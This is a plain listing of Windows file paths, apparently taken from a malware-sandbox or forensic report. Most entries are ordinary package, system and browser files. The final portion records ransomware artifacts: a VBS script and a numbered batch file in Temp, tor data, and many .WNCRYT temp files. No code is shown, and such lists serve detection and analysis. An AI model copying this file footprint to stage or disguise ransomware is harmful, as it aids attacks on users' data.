C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1
C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png
C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png
C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db
C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db
C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db
C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db
C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma
C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif
C:\Users\Public\Music\Sample Music\Kalimba.mp3
C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
C:\Users\Public\Music\Sample Music\Sleep Away.mp3
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
C:\Users\user\AppData\Local\IconCache.db
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png
C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js
C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx
C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js
C:\Users\All Users\Boxstarter\BoxStarter.bat
C:\Users\All Users\Boxstarter\NOTICE.txt
C:\Users\All Users\Boxstarter\VERIFICATION.txt
C:\Users\All Users\chocolatey\LICENSE.txt
C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat
C:\Users\All Users\chocolatey\bin\_processed.txt
C:\Users\All Users\chocolatey\config\chocolatey.config.backup
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt
C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1
C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1
C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1
C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1
C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1
C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1
C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1
C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1
C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1
C:\Users\All Users\chocolatey\tools\checksum.license.txt
C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt
C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg
C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\pkcs11.txt
C:\ba69bdf0a250e352360c33\netfx_Full.mzz
C:\Users\user\AppData\Local\Temp\m.vbs
C:\Users\user\AppData\Local\Temp\275781765172918.bat
C:\Users\user\AppData\Roaming\tor\key-pinning-entries
C:\Users\user\AppData\Local\Temp\1.WNCRYT
C:\Users\user\AppData\Local\Temp\10.WNCRYT
C:\Users\user\AppData\Local\Temp\100.WNCRYT
C:\Users\user\AppData\Local\Temp\101.WNCRYT
C:\Users\user\AppData\Local\Temp\102.WNCRYT
C:\Users\user\AppData\Local\Temp\103.WNCRYT
C:\Users\user\AppData\Local\Temp\104.WNCRYT
C:\Users\user\AppData\Local\Temp\105.WNCRYT
C:\Users\user\AppData\Local\Temp\106.WNCRYT
C:\Users\user\AppData\Local\Temp\107.WNCRYT
C:\Users\user\AppData\Local\Temp\108.WNCRYT
C:\Users\user\AppData\Local\Temp\109.WNCRYT
C:\Users\user\AppData\Local\Temp\11.WNCRYT
C:\Users\user\AppData\Local\Temp\110.WNCRYT
C:\Users\user\AppData\Local\Temp\111.WNCRYT
C:\Users\user\AppData\Local\Temp\112.WNCRYT
C:\Users\user\AppData\Local\Temp\113.WNCRYT
C:\Users\user\AppData\Local\Temp\114.WNCRYT
C:\Users\user\AppData\Local\Temp\115.WNCRYT
C:\Users\user\AppData\Local\Temp\116.WNCRYT
C:\Users\user\AppData\Local\Temp\117.WNCRYT
C:\Users\user\AppData\Local\Temp\118.WNCRYT
C:\Users\user\AppData\Local\Temp\119.WNCRYT
C:\Users\user\AppData\Local\Temp\12.WNCRYT
C:\Users\user\AppData\Local\Temp\120.WNCRYT
C:\Users\user\AppData\Local\Temp\121.WNCRYT
C:\Users\user\AppData\Local\Temp\122.WNCRYT
C:\Users\user\AppData\Local\Temp\123.WNCRYT
C:\Users\user\AppData\Local\Temp\124.WNCRYT
C:\Users\user\AppData\Local\Temp\125.WNCRYT
C:\Users\user\AppData\Local\Temp\126.WNCRYT
C:\Users\user\AppData\Local\Temp\127.WNCRYT
C:\Users\user\AppData\Local\Temp\128.WNCRYT
C:\Users\user\AppData\Local\Temp\129.WNCRYT
C:\Users\user\AppData\Local\Temp\13.WNCRYT
C:\Users\user\AppData\Local\Temp\130.WNCRYT
C:\Users\user\AppData\Local\Temp\131.WNCRYT
C:\Users\user\AppData\Local\Temp\132.WNCRYT
C:\Users\user\AppData\Local\Temp\133.WNCRYT
C:\Users\user\AppData\Local\Temp\134.WNCRYT
C:\Users\user\AppData\Local\Temp\135.WNCRYT
C:\Users\user\AppData\Local\Temp\136.WNCRYT
C:\Users\user\AppData\Local\Temp\137.WNCRYT
C:\Users\user\AppData\Local\Temp\138.WNCRYT
C:\Users\user\AppData\Local\Temp\139.WNCRYT
C:\Users\user\AppData\Local\Temp\14.WNCRYT
C:\Users\user\AppData\Local\Temp\140.WNCRYT
C:\Users\user\AppData\Local\Temp\141.WNCRYT
C:\Users\user\AppData\Local\Temp\142.WNCRYT
C:\Users\user\AppData\Local\Temp\143.WNCRYT
C:\Users\user\AppData\Local\Temp\144.WNCRYT
C:\Users\user\AppData\Local\Temp\145.WNCRYT
C:\Users\user\AppData\Local\Temp\146.WNCRYT
C:\Users\user\AppData\Local\Temp\147.WNCRYT
C:\Users\user\AppData\Local\Temp\148.WNCRYT
C:\Users\user\AppData\Local\Temp\149.WNCRYT
